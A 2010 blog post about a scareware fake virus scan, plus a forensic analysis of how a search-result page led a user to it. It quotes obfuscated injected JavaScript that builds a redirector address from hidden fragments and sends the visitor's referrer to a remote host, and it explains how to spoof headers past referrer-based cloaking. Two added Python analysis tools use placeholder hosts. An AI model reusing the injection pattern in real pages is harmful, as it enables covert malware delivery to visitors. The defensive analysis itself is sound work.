Fake virus warnings - John C. Kirk
Oct. 29th, 2010
08:55 pm - Fake virus warnings
Someone called me earlier because she had a big virus warning on her screen. This was actually a scam: a web page faking a virus scan in order to get you to install malware (often called scareware or a fake anti-virus). It's useful to be aware of how it works, so that you recognise it when you see it.
At the moment, you can duplicate this if you go to this page:
I've deliberately changed "http" to "hxxp", so that you don't click on it by accident. This is a malicious site, so only go there if you're sure that you can get away safely. I've observed the same behaviour in IE8 and Firefox 3.6.12 (on Windows 7), but I haven't tried any other OS/browser.
The main webpage disappears, and instead you get a message box:
Note that this says "Message from webpage", i.e. this has come from the internet, not your local computer. (The equivalent Firefox message tells you which website has generated it.) At this point, you should get rid of the message without clicking "OK" or the red X: however a script dialog is dismissed, control goes straight back to the page's own script, which decides what happens next, so closing the box is not the same as leaving the page. I tried Alt+F4 (in IE), but that still acted as if I'd clicked OK, so the only certain method is to run Task Manager, select this app, then click "End Task".
Anyway, if you do click "OK", you then see a window like this, which appears to be doing a virus scan:
As a general tip, any program that claims to have scanned your entire hard drive in a couple of seconds is lying!
If you try to get rid of this window, it nags you to stick around:
If you click anywhere on the "Security Analysis" screen, it prompts you to download a file:
That's the whole purpose of the exercise - the people who set up the hoax want you to run this file, which will then do something nasty to your computer, e.g. joining their botnet. So, you don't want this file! If you get this far, use Task Manager to shut down the web browser completely.
In theory, you could download the program, scan it for viruses, then run it if it's safe. However, I used McAfee VirusScan Enterprise 8.7 (with all the latest security updates), and that told me that the file was clean. In fairness, I haven't actually run the program, so I am just assuming that it's bad. However, I trust my instincts more than I trust any anti-virus software.
So, if your computer suddenly tells you that you've got loads of viruses, don't panic. If you're not sure what to do, ask for advice. This certainly applies if you're at work: I think I speak for all IT staff when I say that we'd much rather help you out beforehand than clean up the mess afterwards.
The rest of this post is a bit more "forensic", since I've been trying to work out how this happened. This will be very technical, so don't bother reading if you're not an IT person :) If you are a techie, you may be able to help out where I've got stuck. As far as I can tell, here are the steps to reproduce the problem:
1. Go to Google.
2. Do an image search for "map of central america" (without the quotes).
3. The 12th image (at the time of writing) looks like this:
and it takes you to:
(Again, I've mangled the URL to avoid accidental clicking.)
I think that's it, so I can't fault anyone for being taken in. I don't see the fake virus warning on my PC, but based on the firewall logs and my examination of the page, that's all the other person did. Mind you, it's also odd that the virus warning apparently appeared 10 minutes later, so she thought that it was from a different site.
The bigbestmovie page has 4 maps at the top, which are all "stolen" (hotlinked) from other sites. In particular, the one that showed up in the Google image results is this one:
as used on this page:
Just to clarify, the "God's Geography" site looks completely safe, and they have nothing to do with the dodgy stuff going on elsewhere; they're just an innocent bystander.
// Query string: the referring page (the Google results URL) plus this page's title.
// Note that document.title is appended without any URL encoding.
var c1 = "partner.js?frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x1 = "/"+c1;   // same path, relative to this site
// Second copy with a fixed num parameter, pointing at a host assembled from b1..b9
// (string variables that are not shown in this excerpt).
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
The first 2 get replaced at runtime, so the block then looks like this:
The bits in CAPITALS are just placeholders: GOOGLE is the URL of the Google results page, and DOCTITLE is the title of this (bigbestmovie.com) page. So, the first line would really look something like this:
DynDNS.com is a legitimate site, which sells sub-domains in "dyndns-blog.com" and "dyndns-server.com" (among others), so agosagyvux and ucyganijo are the equivalent of LiveJournal usernames. I assume that they both belong to the same person, although I'm not sure why he's using DynDNS at all. One practical attraction of dynamic DNS for this kind of operation is that a hostname can be repointed to a new IP address within minutes, so the redirector stays reachable while its hosting moves around and any blocking based on IP addresses keeps falling behind. Maybe the dodgy code is being hopped around to different machines on a botnet? If so, it's curious that the bigbestmovie.com page also got updated to refer to a different name, particularly in such a short space of time (less than 2 hours).
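The address assembly above can be recovered without letting a browser run the page. The following is an added example (my own code, not anything taken from the bigbestmovie.com page or from elsewhere in this post): a small evaluator that understands only string literals, names, "+" and the one encodeURIComponent() call, walks the var statements in order and reconstructs the URL that x ends up holding, refusing anything else rather than executing it. The b1..b9 fragments, the Google referrer and the page title in the sample are constructed stand-ins (the fragments spell a reserved .invalid hostname, not the real DynDNS name); the four statements after them are the ones quoted above.

```python
import re
from urllib.parse import quote, urlsplit, parse_qs

# One 'var name = <expression>;' statement, as in the snippet.
ASSIGN_RE = re.compile(r"\bvar\s+(\w+)\s*=\s*([^;]+);")
TOKEN_RE = re.compile(
    r"(?P<str>\"[^\"\\]*\"|'[^'\\]*')"  # string literal (no escape sequences needed here)
    r"|(?P<name>[A-Za-z_$][\w$.]*)"     # identifier, possibly dotted (document.title)
    r"|(?P<op>[+()])"
    r"|(?P<ws>\s+)"
)
# The only call the snippet makes; JS leaves - _ . ! ~ * ' ( ) unescaped (quote keeps - _ . ~).
FUNCS = {"encodeURIComponent": lambda s: quote(s, safe="!*'()")}


def tokenize(expr):
    """Yield (kind, text) tokens; anything outside the tiny grammar is an error, never run."""
    pos = 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if m is None:
            raise ValueError(f"unsupported syntax at {expr[pos:pos + 20]!r}")
        pos = m.end()
        if m.lastgroup != "ws":
            yield m.lastgroup, m.group()


class ConcatEvaluator:
    """Evaluates  term ('+' term)*  where a term is a string, a name, or name(expr)."""

    def __init__(self, env):
        self.env = env  # shared dict, so each assignment is visible to later expressions
        self.toks, self.i = [], 0

    def evaluate(self, expr):
        self.toks, self.i = list(tokenize(expr)), 0
        value = self._expr()
        if self.i != len(self.toks):
            raise ValueError(f"trailing tokens in {expr!r}")
        return value

    def _peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def _take(self):
        tok = self._peek()
        if tok is None:
            raise ValueError("unexpected end of expression")
        self.i += 1
        return tok

    def _expr(self):
        value = self._term()
        while self._peek() == ("op", "+"):
            self.i += 1
            value += self._term()
        return value

    def _term(self):
        kind, text = self._take()
        if kind == "str":
            return text[1:-1]
        if kind == "name" and self._peek() == ("op", "("):
            if text not in FUNCS:
                raise ValueError(f"refusing to evaluate a call to {text}()")
            self.i += 1
            arg = self._expr()
            if self._take() != ("op", ")"):
                raise ValueError(f"unbalanced call to {text}()")
            return FUNCS[text](arg)
        if kind == "name":
            return self.env[text]  # KeyError if neither the script nor the runtime defines it
        raise ValueError(f"unexpected token {text!r}")


def resolve_assignments(script, runtime_values):
    """Evaluate every var statement in order and return all resulting values."""
    env = dict(runtime_values)
    evaluator = ConcatEvaluator(env)
    for name, rhs in ASSIGN_RE.findall(script):
        env[name] = evaluator.evaluate(rhs)
    return env


# Constructed sample in the shape of the page's snippet: b1..b9 spell a reserved
# .invalid hostname rather than the real one; the last four statements are the quoted ones.
SAMPLE_SCRIPT = """
var b1="redir"; var b2="ector"; var b3="."; var b4="exa"; var b5="mple";
var b6="."; var b7="inv"; var b8="al"; var b9="id";
var c1 = "partner.js?frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x1 = "/"+c1;
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
"""
# Constructed stand-ins for the two values the browser would supply at run time.
RUNTIME_VALUES = {
    "document.referrer": "http://www.google.co.uk/images?q=map+of+central+america",
    "document.title": "Map Of Central America",
}


def reconstruct(script=SAMPLE_SCRIPT, runtime_values=RUNTIME_VALUES):
    """Return the URL held in x, the host it points at and its decoded query parameters."""
    env = resolve_assignments(script, runtime_values)
    parts = urlsplit(env["x"])
    return {"url": env["x"], "host": parts.hostname, "query": parse_qs(parts.query)}
```

Calling reconstruct() on the sample gives the host redirector.example.invalid and the three parameters num, frm (the decoded Google URL) and default_keyword. To use it on a real page, paste its var statements into the script argument and pass whatever referrer and title the victim's visit would have had; a script that uses anything beyond plain concatenation (eval, array indexing, arithmetic) makes the evaluator stop with an error, which is the point of not using eval.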
If I go to:
then it redirects me to:
which just has a list of YouTube videos. This looks like a deliberately innocuous front, i.e. it's intended to divert suspicion. I'm not sure what the uid is for; maybe this site is a front for lots of malware sites, and they want to keep track of their customers?
If I pass a parameter to the site, as above:
it then redirects me to a different site. Again, I've found that the addresses keep changing, which makes it hard to do any effective blocking. Initially, it went to:
I noticed that this URL is similar to the one above, i.e. they're both Indian-registered domains made up of numbers and punctuation. According to the Indian registry's whois, they are indeed both registered to the same person:
Adam Allen, 87 Columbia Heights, New York 11013
On subsequent visits, the "new-protectionsoft23" page has also redirected me to:
I haven't bothered doing a search, but I'm guessing that these domains also belong to the same guy.
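Walking a chain like the one above by hand is tedious and, if done in a browser, executes whatever each hop serves. The following is an added example (my own script, not anything from this post or from the sites involved): it follows Location headers one hop at a time with redirects disabled, sends a chosen Referer so that a redirector which cares where visitors came from (the frm parameter above suggests this one does) behaves as it would for a real visitor, stops on loops, and collects the distinct hostnames, which is what you'd feed into a block list or an abuse report. The FAKE_SITE table, the Google referrer and the .invalid hostnames are constructed placeholders so that the logic runs offline; http_fetch is what you'd pass for a real run.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}
# Use a browser-like value when reproducing: a redirector may serve different
# content to anything that does not look like a browser.
USER_AGENT = "Mozilla/5.0 (redirect walker)"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib report a 3xx instead of following it, so every hop is seen."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, headers):
    """One GET with redirects not followed; returns (status, lower-cased header dict)."""
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers=headers)
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}
    except urllib.error.HTTPError as err:  # 3xx as well as 4xx/5xx land here
        return err.code, {k.lower(): v for k, v in err.headers.items()}


def walk(start, referer=None, fetch=http_fetch, max_hops=10):
    """Follow Location headers from `start` one hop at a time.

    Returns (hops, reason): hops is a list of (url, status, next_url); reason is
    "ended" (a non-redirect answer), "loop" (a URL repeated) or "max_hops".
    """
    headers = {"User-Agent": USER_AGENT}
    if referer:
        headers["Referer"] = referer  # the redirector may key its decision on this
    hops, seen, url, reason = [], set(), start, "ended"
    while True:
        if url in seen:
            reason = "loop"
            break
        if len(hops) >= max_hops:
            reason = "max_hops"
            break
        seen.add(url)
        status, resp_headers = fetch(url, headers)
        location = resp_headers.get("location")
        next_url = urljoin(url, location) if status in REDIRECT_CODES and location else None
        hops.append((url, status, next_url))
        if next_url is None:
            break
        url = next_url
    return hops, reason


def hosts(hops):
    """Distinct hostnames contacted: what a block list entry or an abuse report needs."""
    return {urlsplit(url).hostname for url, _, _ in hops}


# Constructed offline stand-in for the web: .invalid placeholders, not the real chain.
FAKE_SITE = {
    "http://redirector.example.invalid/":
        (302, {"location": "http://innocent-videos.example.invalid/?uid=1"}),
    "http://innocent-videos.example.invalid/?uid=1": (200, {"content-type": "text/html"}),
    "http://redirector.example.invalid/partner.js?num=114&frm=x":
        (302, {"location": "http://scanner-a.example.invalid/"}),
    "http://scanner-a.example.invalid/": (302, {"location": "/scan"}),  # relative Location
    "http://scanner-a.example.invalid/scan": (200, {"content-type": "text/html"}),
    "http://loop-a.example.invalid/": (302, {"location": "http://loop-b.example.invalid/"}),
    "http://loop-b.example.invalid/": (302, {"location": "http://loop-a.example.invalid/"}),
}
REQUEST_LOG = []  # (url, Referer sent) for each fake request


def fake_fetch(url, headers):
    """Answer from FAKE_SITE instead of the network; same signature as http_fetch."""
    REQUEST_LOG.append((url, headers.get("Referer")))
    return FAKE_SITE.get(url, (404, {}))


if __name__ == "__main__":
    chain, why = walk("http://redirector.example.invalid/partner.js?num=114&frm=x",
                      referer="http://www.google.co.uk/", fetch=fake_fetch)
    for url, status, next_url in chain:
        print(status, url, "->", next_url or "(stop)")
    print(why, sorted(hosts(chain)))
```

Run it twice against a live redirector, once with and once without the Referer, and diff the hop lists: if the destinations differ, that is the reason a direct visit to the page shows nothing. Keep the run inside a throwaway VM anyway, since a 200 at the end of the chain is still a page you have fetched, even if nothing in it was rendered or executed.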
I've got that far, but now I'm stuck. Should I report this to someone? If so, whom? The obvious places are Google's Safe Browsing malware report form for the search result, the DynDNS abuse contact for the two hostnames, and the registrar listed in the whois records for the .in domains. I don't know whether the bigbestmovie.com site is directly involved in this, or whether they've been hacked. However, even in the best case scenario they look a bit dodgy, i.e. stealing content and throwing in phrases like "miss america" to attract search engines, and for practical purposes they're still dangerous to visitors. Google might be willing to block that site from their search results; the only snag is that I can't duplicate the problem on my machine, so they might not get it either. One possible explanation for that, given the script above: the partner.js request sends the referrer (frm=) and the page title to the redirector, so a visit that doesn't arrive from a Google results page may well be served something harmless, and anyone trying to reproduce it should set the Referer header to the Google search URL (and a browser-like User-Agent) rather than browsing to the page directly. Again, any suggestions would be welcome.
Ah well, if nothing else it's been an interesting exercise.